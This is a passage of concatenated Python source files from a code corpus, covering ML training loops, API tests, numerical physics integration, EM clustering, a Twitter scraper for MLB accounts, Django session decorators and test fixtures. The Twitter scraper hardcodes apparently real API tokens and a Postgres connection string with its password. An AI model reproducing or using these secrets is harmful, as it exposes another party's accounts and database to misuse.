nd.stack(*(aug(_) for _ in train_batch_data))\n train_batch_data = nd.transpose(train_batch_data, axes=(0,3,1,2))\n else:\n train_batch_data = batch[0]\n data = gluon.utils.split_and_load(train_batch_data, ctx_list=ctx, batch_axis=0)\n label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0)\n with autograd.record():\n outputs = [net(_) for _ in data]\n losses = [loss(z,y) for z,y in zip(outputs,label)]\n [_.backward() for _ in losses]\n trainer.step(batch[0].shape[0])\n \n train_epoch_outputs.append(np.concatenate([nd.softmax(_, axis=1).asnumpy() for _ in outputs]))\n train_epoch_losses.append(np.concatenate([_.asnumpy() for _ in losses]))\n train_epoch_labels.append(batch[1].asnumpy())\n\n nd.waitall()\n train_epoch_outputs = np.concatenate(train_epoch_outputs)\n train_epoch_labels = np.concatenate(train_epoch_labels)\n train_epoch_losses = np.concatenate(train_epoch_losses).mean()\n\n train_metrics_epoch = dict(loss=train_epoch_losses)\n train_metrics_epoch.update(evaluate(train_epoch_labels, train_epoch_outputs))\n \n logging.info('training :' + metric_str(train_metrics_epoch.keys(), train_metrics_epoch.values()))\n \n ######## validation #########\n \n val_epoch_outputs = []\n val_epoch_labels = []\n val_epoch_losses = [] \n \n for i, batch in enumerate(val_iter):\n data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0)\n label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0)\n\n outputs = [net(_) for _ in data]\n losses = [loss(z,y) for z,y in zip(outputs,label)]\n \n val_epoch_outputs.append(np.concatenate([nd.softmax(_, axis=1).asnumpy() for _ in outputs]))\n val_epoch_losses.append(np.concatenate([_.asnumpy() for _ in losses]))\n val_epoch_labels.append(batch[1].asnumpy())\n\n nd.waitall()\n val_epoch_outputs = np.concatenate(val_epoch_outputs)\n val_epoch_labels = np.concatenate(val_epoch_labels)\n val_epoch_losses = np.concatenate(val_epoch_losses).mean()\n\n\n val_metrics_epoch = dict(loss=val_epoch_losses)\n val_metrics_epoch.update(evaluate(val_epoch_labels, val_epoch_outputs))\n \n logging.info('validation:' + metric_str(val_metrics_epoch.keys(), val_metrics_epoch.values()))\n logging.info('time cost: %f'% (time.time()-tic))\n\n if args.model_save_prefix is None:\n continue\n \n if args.save_all > 0:\n dumps = dict(val_uid=val_uid,\n val_epoch_outputs=val_epoch_outputs,\n val_epoch_labels=val_epoch_labels,\n val_epoch_losses=val_epoch_losses,\n train_epoch_outputs=train_epoch_outputs,\n train_epoch_labels=train_epoch_labels,\n train_epoch_losses=train_epoch_losses)\n dumps_path = os.path.join(model_save_path, 'phase2-%04d-dumps.pkl'%epoch)\n with open(dumps_path, 'wb') as f:\n pickle.dump(dumps, f, pickle.HIGHEST_PROTOCOL)\n \n suffix=[]\n toBeSaved = False\n if val_metrics_epoch['loss'] < best_val_loss:\n suffix.append('LOSS%0.3f' % val_metrics_epoch['loss'])\n best_val_loss = val_metrics_epoch['loss']\n toBeSaved = True\n else:\n suffix.append('loss%0.3f' % val_metrics_epoch['loss'])\n \n if val_metrics_epoch['auc'] > best_val_auc:\n suffix.append('AUC%0.3f' % val_metrics_epoch['auc'])\n best_val_auc = val_metrics_epoch['auc']\n toBeSaved = True\n else:\n suffix.append('auc%0.3f' % val_metrics_epoch['auc'])\n \n if val_metrics_epoch['acc'] > best_val_acc:\n suffix.append('ACC%0.3f' % val_metrics_epoch['acc'])\n best_val_acc = val_metrics_epoch['acc'] \n toBeSaved = True\n else:\n suffix.append('acc%0.3f' % val_metrics_epoch['acc'])\n \n if toBeSaved or args.save_all>0:\n logging.info('Best %s. Checkpointing...' % ' '.join(suffix))\n #net.collect_params().save(os.path.join(model_save_path, 'phase2-%d_%s.params'%(epoch,'_'.join(suffix))))\n \n net.export(os.path.join(model_save_path, 'phase2-%04d_%s'%(epoch,'_'.join(suffix))))\n \n \n","sub_path":"Dataprocessing/train_phase2.py","file_name":"train_phase2.py","file_ext":"py","file_size_in_byte":15095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"108095563","text":"#-*-coding:utf-8 -*-\n__author__ = 'SUNWEIWEI002'\nfrom common.getconfig import GetConfig\nfrom common.verify import Verify\nfrom nose.plugins.attrib import attr\nfrom common.requestslib import RequestsLib\nfrom common.getexpectdata import GetExpectData\nfrom ddt import ddt,data\n\n@attr('searchfromhuazhu','hhub3')\n@ddt\nclass TestSearchFromHuazhu():\n @classmethod\n def setup_class(self):\n self.conf = GetConfig()\n self.verity=Verify()\n self.url = self.conf.get_conf_value(\"hhub3\",\"url\")+r\"api/Invoice/SearchFromHuazhu\"\n self.requestslib = RequestsLib()\n\n @data(\n [0,1],[0,2],[0,4],[0,8],[0,16],[0,32],[0,64],[0,128],[0,512],[0,1024],[0,2048],\n [1,1],[1,2],[1,4],[1,8],[1,16],[1,32],[1,64],[1,128],[1,512],[1,1024],[1,2048],\n [2,1],[2,2],[2,4],[2,8],[2,16],[2,32],[2,64],[2,128],[2,512],[2,1024],[2,2048],\n\n )\n\n def testsearchfromhuazhu_status(self, hac):\n u'查询所有发票信息;发票类型和排序的组合测试返回200'\n requests_body={\n \"HotelStyle\": hac[0],\n \"citySource\": hac[1],\n }\n response = self.requestslib.send_request_by_accesstoken(\"get\", self.url, requests_body)\n self.verity.by_status(response,200)\n\n","sub_path":"testproject/hhub3/invoice/searchfromhuazhu/testsearchfromhuazhu.py","file_name":"testsearchfromhuazhu.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"301839996","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 21:51:38 2019\n\n@author: pablo gullith\n\"\"\"\nG = 6.674e-11\nL = 10\nM = 10000\nsigma = M/L**2\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#Guassiana dupla a partir do algoritmo de mark newman\n\ndef gaussxw(Ni,Nj):\n\n \n a = np.linspace(3,4*Ni-1,Ni)/(4*Ni+2)\n b = np.linspace(3,4*Nj-1,Nj)/(4*Nj+2)\n x = np.cos(np.pi*a+1/(8*Ni*Ni*np.tan(a)))\n y = np.cos(np.pi*b+1/(8*Nj*Nj*np.tan(b)))\n\n tol = 1e-15\n teta = 100.0\n while (teta > tol):\n P0x = np.ones(Ni,float)\n P1x = np.copy(x)\n for k in range(1,Ni):\n P0x,P1x = P1x,((2*k+1)*x*P1x-k*P0x)/(k+1)\n dPx = (Ni+1)*(P0x-x*P1x)/(1-x**2)\n dx = P1x/dPx\n x = x - dx\n teta = np.max(abs(dx))\n teta = 100.0\n while (teta > tol):\n P0y = np.ones(Nj,float)\n P1y = np.copy(y)\n for k in range(1,Nj):\n P0y,P1y = P1y,((2*k+1)*y*P1y-k*P0y)/(k+1)\n dPy = (Nj+1)*(P0y-y*P1y)/(1-y**2)\n dy = P1y/dPy\n y = y - dy\n teta = np.max(abs(dy)) \n\n wx = 2*(Ni+1)*(Ni+1)/(Ni*Ni*(1-x*x)*dPx**2)\n wy = 2*(Nj+1)*(Nj+1)/(Nj*Nj*(1-y*y)*dPy**2)\n\n return x,y,wx,wy\n\n#Definições usuais\n\ndef gaussxw_a(Ni,Nj,xi,xf,yi,yf):\n x,y,wx,wy = gaussxw(Ni,Nj)\n return 0.5*(xf-xi)*x+0.5*(xf+xi),0.5*(xf-xi)*wx , 0.5*(yf-yi)*y+0.5*(yf+yi),0.5*(yf-yi)*wy\n\ndef f(x,y,z):\n return (x**2+y**2+z**2)**(-3/2)\n\ndef Gaussian(Ni,Nj,xi,xf,yi,yf,z):\n x,wx,y,wy = gaussxw_a(Ni,Nj,xi,xf,yi,yf);\n s = 0\n for i in range(Ni):\n for j in range(Nj):\n s = s + wx[i]*wy[j]*f(x[i],y[j],z) \n return s \n\nxi = yi = -L/2\nxf = yf = L/2\n\nNi = 100\nNj = 100\n\nz = np.linspace(0,10,1000)\nR = Gaussian(Ni,Nj,xi,xf,yi,yf,z)\nFz = G*sigma*z*R\n\nplt.plot(z,Fz)\nplt.xlabel('z')\nplt.ylabel('Módulo')\nplt.title('Força gravitacional')\nplt.show()\nplt.style.use('seaborn')\n\nNi = 1500\nNj = 1500\n\ndef S(i,N): \n if (i == 0 or i == N):\n return(1/2)\n else:\n return 1\n\ndef Simp2(xi,xf,yi,yf,Ni,Nj,z):\n hx = (xf - xi)/Ni\n hy = (yf - yi)/Nj\n s = 0.0\n for i in range(Ni+1):\n for j in range(Nj+1):\n s = s + S(i,Ni)*S(j,Nj)*f(xi + i*hx, yi + j*hy, z)\n return (hx*hy*s)\n\nR = Simp2(xi,xf,yi,yf,Ni,Nj,z)\nFz = G*sigma*z*R\nplt.clf()\nplt.plot(z,Fz)\nplt.xlabel('z')\nplt.ylabel('Módulo')\nplt.title('Força gravitacional')\nplt.show()\nplt.style.use('seaborn')\n#Comentários\n# Na quadratura gaussiana algumas funções não são bem tratadas\n# Para contornar isso, nós podemos usar outro método de integração ou \n# Fazer o aumento de N, assim chegamos a um maior número de pontos perto da\n# origem, mas seriam necessários inúmeros deles. Com o maior número de pontos\n# Maior a lentidão do programa rodar.\n#Usamos 1500 porque com números menores, os grafícos não são satisfatórios","sub_path":"Questao4.py","file_name":"Questao4.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"144984408","text":"import numpy as np\nfrom scipy.stats import multivariate_normal\n\nfrom HW_4 import utils\n\n\nclass EM:\n\n def __init__(self, seed, no_of_gaussian, gaussian_dimensions, cov_diagonal_multiplier) -> None:\n super().__init__()\n self.seed = seed\n self.no_of_gaussian = no_of_gaussian\n self.gaussian_dimensions = gaussian_dimensions\n self.mean = None\n self.cov = None\n self.mixture_coefficient = None\n self.z_i_m = None\n self.cov_diagonal_multiplier = cov_diagonal_multiplier\n np.random.seed(seed)\n\n def e_step(self, data):\n p0 = multivariate_normal.pdf(data, mean=self.mean[0], cov=self.cov[0])\n p1 = multivariate_normal.pdf(data, mean=self.mean[1], cov=self.cov[1])\n probs = np.array([p0, p1])\n z_i_m = (probs * self.mixture_coefficient) / np.sum(probs * self.mixture_coefficient, axis=0)\n self.z_i_m = z_i_m\n\n def m_step(self, data):\n mean0 = np.sum(self.z_i_m[0] * data.T, axis=1) / np.sum(self.z_i_m[0])\n mean1 = np.sum(self.z_i_m[1] * data.T, axis=1) / np.sum(self.z_i_m[1])\n p0, p1 = np.sum(self.z_i_m, axis=1) / data.shape[0]\n sigma0 = np.dot((self.z_i_m[0] * (data - mean0).T), (data - mean0)) / np.sum(self.z_i_m[0])\n sigma1 = np.dot((self.z_i_m[1] * (data - mean1).T), (data - mean1)) / np.sum(self.z_i_m[1])\n\n self.mean = np.array([mean0, mean1])\n self.cov = np.array([sigma0, sigma1])\n self.mixture_coefficient = np.array([[p0], [p1]])\n\n def train(self, data, epochs, display_step):\n self.z_i_m = np.random.random((self.no_of_gaussian, data.shape[0]))\n self.z_i_m = self.z_i_m / np.sum(self.z_i_m, axis=0)\n\n for i in range(epochs):\n self.m_step(data)\n self.e_step(data)\n\n # if i % display_step == 0 or i == 0:\n # self.plot_gaussian(data)\n\n def plot_gaussian(self, data):\n print(\"Mean\", self.mean)\n print(\"Cov\", self.cov)\n print(\"Pie\", self.mixture_coefficient)\n\n\ndef demo_em_on_mixture_of_two_gaussian_data():\n data = utils.get_mixture_of_two_gaussian_data()\n em = EM(42, 2, 2, 0.01)\n em.train(data, 100, 1000)\n print(\"Mean\", em.mean)\n print(\"Sigma\", em.cov)\n print(\"Mixture Coefficients\", em.mixture_coefficient)\n\n\nif __name__ == '__main__':\n demo_em_on_mixture_of_two_gaussian_data()\n","sub_path":"src/HW_4/EM_for_2_gaussian.py","file_name":"EM_for_2_gaussian.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"459748110","text":"import socket\nimport cv2\nfrom cv2 import aruco\n\nvid = cv2.VideoCapture(0)\naruco_dict = aruco.Dictionary_get(aruco.DICT_7X7_250)\n\nclient = []\n\nclient.append(socket.socket())\nclient.append(socket.socket())\nhost = '192.168.43.18'\nhost1 = ''\nport = 8090\nprint(\"Waiting for connection\")\ntry:\n client[0].connect((host, port))\n print(\"Connected!!\")\nexcept socket.error as e:\n print(str(e))\nprint(\"Waiting for connection\")\ntry:\n client[1].connect((host1, port))\n print(\"Connected!!\")\nexcept socket.error as e:\n print(str(e))\nfor i in range(0, 2):\n while True:\n __, frame = vid.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n parameters = aruco.DetectorParameters_create()\n corners, ids, rejectedImgPoints = aruco.detectMarkers(\n gray, aruco_dict, parameters=parameters)\n frame_markers = aruco.drawDetectedMarkers(frame.copy(), corners, ids)\n cv2.imshow(\"Ids\", frame_markers)\n if ids == 2:\n client[i].send(str.encode(\"F\"))\n else:\n client[i].send(str.encode(\"S\"))\n if cv2.waitKey(10) & 0xFF == ord('q'):\n vid.release()\n cv2.destroyAllWindows()\n break\n client[i].close()\n i = i+1","sub_path":"Sockets test with esp32 as server.py","file_name":"Sockets test with esp32 as server.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"585210793","text":"import functools\nimport hashlib\nfrom importlib import import_module\n\nfrom django.conf import settings\n\n\ndef linearize(func):\n \"\"\"\n Makes sure the contained consumer does not run at the same time other\n consumers are running on messages with the same reply_channel.\n\n Required if you don't want weird things like a second consumer starting\n up before the first has exited and saved its session. Doesn't guarantee\n ordering, just linearity.\n \"\"\"\n raise NotImplementedError(\"Not yet reimplemented\")\n\n @functools.wraps(func)\n def inner(message, *args, **kwargs):\n # Make sure there's a reply channel\n if not message.reply_channel:\n raise ValueError(\n \"No reply_channel in message; @linearize can only be used on messages containing it.\"\n )\n # TODO: Get lock here\n pass\n # OK, keep going\n try:\n return func(message, *args, **kwargs)\n finally:\n # TODO: Release lock here\n pass\n return inner\n\n\ndef channel_session(func):\n \"\"\"\n Provides a session-like object called \"channel_session\" to consumers\n as a message attribute that will auto-persist across consumers with\n the same incoming \"reply_channel\" value.\n\n Use this to persist data across the lifetime of a connection.\n \"\"\"\n @functools.wraps(func)\n def inner(message, *args, **kwargs):\n # Make sure there's a reply_channel\n if not message.reply_channel:\n raise ValueError(\n \"No reply_channel sent to consumer; @channel_session \" +\n \"can only be used on messages containing it.\"\n )\n\n # Make sure there's NOT a channel_session already\n if hasattr(message, \"channel_session\"):\n raise ValueError(\"channel_session decorator wrapped inside another channel_session decorator\")\n\n # Turn the reply_channel into a valid session key length thing.\n # We take the last 24 bytes verbatim, as these are the random section,\n # and then hash the remaining ones onto the start, and add a prefix\n reply_name = message.reply_channel.name\n hashed = hashlib.md5(reply_name[:-24].encode()).hexdigest()[:8]\n session_key = \"skt\" + hashed + reply_name[-24:]\n # Make a session storage\n session_engine = import_module(settings.SESSION_ENGINE)\n session = session_engine.SessionStore(session_key=session_key)\n # If the session does not already exist, save to force our\n # session key to be valid.\n if not session.exists(session.session_key):\n session.save(must_create=True)\n message.channel_session = session\n # Run the consumer\n try:\n return func(message, *args, **kwargs)\n finally:\n # Persist session if needed\n if session.modified:\n session.save()\n return inner\n\n\ndef http_session(func):\n \"\"\"\n Wraps a HTTP or WebSocket connect consumer (or any consumer of messages\n that provides a \"cookies\" or \"get\" attribute) to provide a \"http_session\"\n attribute that behaves like request.session; that is, it's hung off of\n a per-user session key that is saved in a cookie or passed as the\n \"session_key\" GET parameter.\n\n It won't automatically create and set a session cookie for users who\n don't have one - that's what SessionMiddleware is for, this is a simpler\n read-only version for more low-level code.\n\n If a message does not have a session we can inflate, the \"session\" attribute\n will be None, rather than an empty session you can write to.\n \"\"\"\n @functools.wraps(func)\n def inner(message, *args, **kwargs):\n if \"cookies\" not in message.content and \"get\" not in message.content:\n raise ValueError(\"No cookies or get sent to consumer - cannot initialise http_session\")\n # Make sure there's NOT a http_session already\n if hasattr(message, \"http_session\"):\n raise ValueError(\"http_session decorator wrapped inside another http_session decorator\")\n # Make sure there's a session key\n session_key = None\n if \"get\" in message.content:\n try:\n session_key = message.content['get'].get(\"session_key\", [])[0]\n except IndexError:\n pass\n if \"cookies\" in message.content and session_key is None:\n session_key = message.content['cookies'].get(settings.SESSION_COOKIE_NAME)\n # Make a session storage\n if session_key:\n session_engine = import_module(settings.SESSION_ENGINE)\n session = session_engine.SessionStore(session_key=session_key)\n else:\n session = None\n message.http_session = session\n # Run the consumer\n result = func(message, *args, **kwargs)\n # Persist session if needed (won't be saved if error happens)\n if session is not None and session.modified:\n session.save()\n return result\n return inner\n","sub_path":"channels/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153479847","text":"import pytest\nfrom model_mommy import mommy\n\npytestmark = pytest.mark.django_db\n\n\nclass TestPublicSshKey:\n def test_init(self):\n obj = mommy.make('ewl_ssh.PublicSshKey')\n\n assert obj.pk == 1, 'Should create a PublicSshKey instance'\n\n def test_str(self):\n algorithm = 'ssh-rsa'\n key = 'this_is_a_very_secure_key'\n comment = 'user@localhost_1970-01-01'\n\n obj = mommy.make('ewl_ssh.PublicSshKey', algorithm=algorithm, key=key, comment=comment)\n\n assert str(obj) == f'{algorithm} {key} {comment}', 'Should return authorized_keys compatible string'\n","sub_path":"ewl_ssh/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"572331647","text":"import pandas as pd\nimport requests\nimport numpy as np\nimport json\nimport csv\nimport time\nimport datetime\nimport urllib3\nimport sys\nimport os\nimport warnings\nimport pandas as pd\nimport os\nimport numpy as np\nfrom sqlalchemy import create_engine\nimport psycopg2\nimport warnings\nfrom datetime import datetime\nfrom pandas.core.common import SettingWithCopyWarning\nwarnings.simplefilter(action=\"ignore\", category=SettingWithCopyWarning)\n\n\n\nengine = create_engine('postgres://gajpivqijkldsv:e71d7868249438e0b78e6cc37825dad10f322ef598118335a624165f9311720f@ec2-54-211-210-149.compute-1.amazonaws.com:5432/dc5355dnsr456p')\n\nconn = psycopg2.connect(dbname='dc5355dnsr456p', user='gajpivqijkldsv', password='e71d7868249438e0b78e6cc37825dad10f322ef598118335a624165f9311720f',\n host='ec2-54-211-210-149.compute-1.amazonaws.com', port='5432', sslmode='require')\ncursor = conn.cursor()\n\n\nmost_recent = pd.read_csv(\"most_recent_tweets.csv\")\n## need to get all twitter handles\n## might be easier to look for the twitter handles based on\nimport tweepy\nimport csv\nimport pandas as pd\nimport numpy as np\nimport time\nimport datetime\n\nACCESS_TOKEN = \"924682665399382016-saFgc1u1ASXXhueEhoIhoLtC0h1PUQx\"\nACCESS_TOKEN_SECRET = \"TOTHNVVqqpswW401Cg2G7c6NzAgmvMjIiT2p1BsczBvYu\"\nCONSUMER_KEY = \"KR0RquMlrK6RInnZvhL2ibhQF\"\nCONSUMER_SECRET = \"aDt5c5M0PJP6EfipBDiH2rsVzx87vGaQQ630aAfMYc4ZEFZFve\"\n\n# OAuth process, using the keys and tokens\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n\n# Creation of the actual interface, using authentication\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\nhandle = most_recent['handle'].to_list()\nsince_id = most_recent['status_id'].to_list()\n\nuser_name_list = []\nfulltest_list = []\nstatus_id_list = []\ncreated_list = []\nsource_list = []\nfavorite_count = []\nretweet_count = []\ncoordinates_list = []\ngeo_list = []\nhandle_list = []\nfollower_count_list = []\ncity_list = []\ncity_abr_list = []\nleague_list = []\ndivision_list = []\n\nfor i in range(0,len(handle)):\n\n followercount = api.get_user('{}'.format(handle[i])).followers_count\n\n for status in tweepy.Cursor(api.user_timeline, screen_name= handle[i], tweet_mode=\"extended\",since_id=since_id[i]).items():\n# for status in tweepy.Cursor(api.user_timeline, screen_name= mlbHandles[i], tweet_mode=\"extended\").items():\n user_name_list.append(status.user.name)\n fulltest_list.append(status.full_text)\n status_id_list.append(np.array(status.id))\n created_list.append(status.created_at)\n source_list.append(status.source)\n favorite_count.append(status.favorite_count)\n retweet_count.append(status.retweet_count)\n coordinates_list.append(status.coordinates)\n geo_list.append(status.geo)\n handle_list.append(handle[i])\n# city_list.append(city_mlb[i])\n# city_abr_list.append(city_abr_mlb[i])\n# league_list.append(league_mlb[i])\n# division_list.append(division_mlb[i])\n follower_count_list.append(followercount)\n \n time.sleep(5)\n\nnewest_tweets = pd.DataFrame({\n 'username': user_name_list,\n 'full_text': fulltest_list,\n 'status_id': status_id_list,\n 'create_at': created_list,\n 'source': source_list,\n 'favorite_count': favorite_count,\n 'retweet_count': retweet_count,\n 'coordinates': coordinates_list,\n 'geo': geo_list,\n 'handle': handle_list,\n 'followercount': follower_count_list, \n# 'city': city_list,\n# 'city_abr':city_abr_list,\n# 'league':league_list,\n# 'disivion':division_list\n \n})\n\nprint('finished pulling new tweets')\n\n# save off latest tweet id\nmost_recent = newest_tweets[['handle', 'create_at', 'status_id']]\nmost_recent = most_recent[most_recent['create_at'] == most_recent.groupby('handle')['create_at'].transform('max')]\nmost_recent = most_recent.reset_index(drop=True)\n\nmost_recent.to_csv(\"most_recent_tweets.csv\")\n\n# code to create top ten tweets\nnow = pd.to_datetime('now')\nfrom datetime import datetime, timedelta\nd = now - timedelta(days=1)\n\n#get ratio and volume\ntop_5_volume = newest_tweets[newest_tweets['create_at'] > d]\ntop_5_volume = top_5_volume.sort_values(by=['favorite_count'], ascending=False)\ntop_5_volume['favorite_ratio'] = top_5_volume['favorite_count']/top_5_volume['followercount']\ntop_5_ratio = top_5_volume.sort_values(by=['favorite_ratio'], ascending=False)\ntop_5_ratio = top_5_ratio.drop_duplicates(subset=['username'])\ntop_5_volume = top_5_volume.drop_duplicates(subset=['username'])\ntop_5_volume = top_5_volume.head(5)\ntop_5_list = top_5_volume['status_id'].to_list()\n\n# make sure ratio tweets don't have tweets from top 5 \ntop_5_ratio = top_5_ratio[~top_5_ratio['status_id'].isin(top_5_list)]\ntop_5_ratio = top_5_ratio.drop_duplicates(subset = ['username'])\ntop_5_ratio = top_5_ratio.head(5)\n\n# create one dataframe\ntweets_top_ten = pd.concat([top_5_volume, top_5_ratio])\ntweets_top_ten = tweets_top_ten.reset_index()\n\ntweet_list = tweets_top_ten['status_id'].to_list()\n\n# add twitter block\nnew_list_for_df = []\nfor i in range(0, len(tweet_list)):\n new_list_for_df.append('''
      \n
      \n '''.format(tweet_list[i]))\n \ntweets_top_ten['twitter_block'] = new_list_for_df\n\ntweets_top_ten['index'] = tweets_top_ten['index'].values.astype(int)\ntweets_top_ten['favorite_count'] = tweets_top_ten['favorite_count'].values.astype(int)\ntweets_top_ten['retweet_count'] = tweets_top_ten['retweet_count'].values.astype(int)\n\ntest = tweets_top_ten[['index', 'twitter_block', 'full_text', 'username', 'handle']]\n\n# send to database\ntest.to_sql('daily_top_ten', engine, schema='public', if_exists='replace', chunksize=1000, method='multi', index=False)\n\nprint('finished tweets')\n","sub_path":"mlb_twitter.py","file_name":"mlb_twitter.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"219666647","text":"import pytest\nimport os\nimport copy\nimport globus_sdk\nfrom unittest.mock import Mock\nfrom .mocks import (MemoryStorage, MOCK_TOKEN_SET, GlobusTransferTaskResponse,\n ANALYSIS_FILE_BASE_DIR)\n\nfrom pilot.client import PilotClient\nimport pilot\n\n\n@pytest.fixture\ndef mem_storage():\n return MemoryStorage()\n\n\n@pytest.fixture\ndef mock_tokens():\n return copy.deepcopy(MOCK_TOKEN_SET)\n\n\n@pytest.fixture\ndef mock_config(monkeypatch):\n\n class MockConfig(pilot.config.Config):\n data = {}\n\n def save(self, data):\n self.data = {str(k): v for k, v in data.items()}\n\n def load(self):\n return self.data\n\n mc = MockConfig()\n monkeypatch.setattr(pilot.config, 'config', mc)\n return mc\n\n\n@pytest.fixture\ndef simple_tsv():\n return os.path.join(ANALYSIS_FILE_BASE_DIR, 'simple.tsv')\n\n\n@pytest.fixture\ndef mock_transfer_client(monkeypatch):\n st = Mock()\n monkeypatch.setattr(globus_sdk.TransferClient, 'submit_transfer', st)\n st.return_value = GlobusTransferTaskResponse()\n monkeypatch.setattr(globus_sdk, 'TransferData', Mock())\n return st\n\n\n@pytest.fixture\ndef mock_auth_pilot_cli(mock_transfer_client):\n \"\"\"\n Returns a mock logged in pilot client. Storage is mocked with a custom\n object, so this does behave slightly differently than the real client.\n All methods that reach out to remote resources are mocked, you need to\n re-mock them to return the test data you want.\n \"\"\"\n pc = PilotClient()\n pc.token_storage = MemoryStorage()\n pc.token_storage.tokens = MOCK_TOKEN_SET\n pc.upload = Mock()\n pc.ingest_entry = Mock()\n pc.get_search_entry = Mock()\n pc.ls = Mock()\n # Sanity. This *should* always return True, but will fail if we update\n # tokens at a later time.\n assert pc.is_logged_in()\n return pc\n\n\n@pytest.fixture\ndef mock_command_pilot_cli(mock_auth_pilot_cli, monkeypatch):\n mock_func = Mock()\n mock_func.return_value = mock_auth_pilot_cli\n monkeypatch.setattr(pilot.commands, 'get_pilot_client', mock_func)\n return mock_auth_pilot_cli\n","sub_path":"tests/unit/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"400267489","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport os\r\nimport shutil\r\nfrom datetime import datetime\r\nimport keras.backend as K\r\n\r\n\r\ndef self_Att_channel(x, x_att, r=16, name='1'):\r\n '''\r\n advanced\r\n Hu, Jie, Li Shen, and Gang Sun.\"Squeeze-and-excitation networks.\" arXiv preprintarXiv:1709.01507 (2017).\r\n :param x:\r\n :param r:\r\n :return:\r\n '''\r\n x_self = x\r\n chanel = K.int_shape(x)[-1]\r\n L = K.int_shape(x)[-2]\r\n\r\n x_att = tf.keras.layers.GlobalAveragePooling2D(name='self_max_pool' + name)(x_att)\r\n\r\n # x_att = layers.Conv2D(chanel,\r\n # (H,W),\r\n # padding='valid',\r\n # use_bias=None,\r\n # name='FCN' + name)(x_att)\r\n\r\n x_att = tf.keras.layers.Dense(int(chanel / r), activation='relu')(x_att)\r\n x_att = tf.keras.layers.Dense(chanel, activation='sigmoid')(x_att)\r\n x = tf.keras.layers.Multiply()([x_self, x_att])\r\n\r\n return x\r\n\r\n\r\n# def cnv(inp, kernel_shape, scope_name, stride=[1, 1, 1, 1], dorelu=True,\r\n# weight_init_fn=tf.random_normal_initializer,\r\n# bias_init_fn=tf.constant_initializer, bias_init_val=0.0, pad='SAME', ): # kernel_shape:[卷积核宽,卷积核高,输入通道数,输出通道数]\r\n#\r\n# with tf.variable_scope(scope_name):\r\n# std = 1 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])\r\n# std = std ** .5\r\n# weights = tf.get_variable('weights', kernel_shape,\r\n# initializer=weight_init_fn(stddev=std))\r\n# biases = tf.get_variable('biases', [kernel_shape[-1]],\r\n# initializer=bias_init_fn(bias_init_val))\r\n# conv = tf.nn.conv2d(inp, weights, strides=stride, padding=pad) + biases\r\n# # Add ReLU\r\n# if dorelu:\r\n# return tf.nn.relu(conv)\r\n# else:\r\n# return conv\r\n\r\ndef cnv(inp, output_channel):\r\n f = output_channel\r\n conv = tf.layers.batch_normalization(\r\n tf.layers.conv2d(inputs=inp, filters=f, kernel_size=[3, 3], strides=[1, 1], padding=\"same\",\r\n activation=tf.nn.leaky_relu))\r\n return conv\r\n\r\n\r\nclass SVSRNN(object):\r\n\r\n def __init__(self, num_features, num_rnn_layer=3, num_hidden_units=[1024, 1024, 1024],\r\n tensorboard_directory='graphs/svsrnn', clear_tensorboard=True):\r\n\r\n assert len(num_hidden_units) == num_rnn_layer\r\n\r\n self.num_features = num_features\r\n self.num_rnn_layer = num_rnn_layer\r\n self.num_hidden_units = num_hidden_units\r\n\r\n self.gstep = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')\r\n self.learning_rate = tf.placeholder(tf.float32, shape=[], name='learning_rate')\r\n\r\n # The shape of x_mixed, y_src1, y_src2 are [batch_size, n_frames (time), n_frequencies]\r\n self.x_mixed = tf.placeholder(tf.float32, shape=[None, None, num_features], name='x_mixed') # (64,10,513)\r\n self.y_src1 = tf.placeholder(tf.float32, shape=[None, None, num_features], name='y_src1')\r\n self.y_src2 = tf.placeholder(tf.float32, shape=[None, None, num_features], name='y_src2')\r\n\r\n self.y_pred_src1, self.y_pred_src2 = self.network_initializer()\r\n\r\n # Loss balancing parameter\r\n self.gamma = 0.001\r\n self.loss = self.loss_initializer()\r\n self.optimizer = self.optimizer_initializer()\r\n\r\n self.saver = tf.train.Saver()\r\n self.sess = tf.Session()\r\n self.sess.run(tf.global_variables_initializer())\r\n\r\n if not os.path.exists(tensorboard_directory):\r\n os.makedirs(tensorboard_directory)\r\n # Tensorboard summary\r\n if clear_tensorboard:\r\n shutil.rmtree(tensorboard_directory, ignore_errors=True)\r\n logdir = tensorboard_directory\r\n else:\r\n now = datetime.now()\r\n logdir = os.path.join(tensorboard_directory, now.strftime('%Y%m%d-%H%M%S'))\r\n self.writer = tf.summary.FileWriter(logdir, tf.get_default_graph())\r\n self.summary_op = self.summary()\r\n\r\n def network(self):\r\n # input_layer = 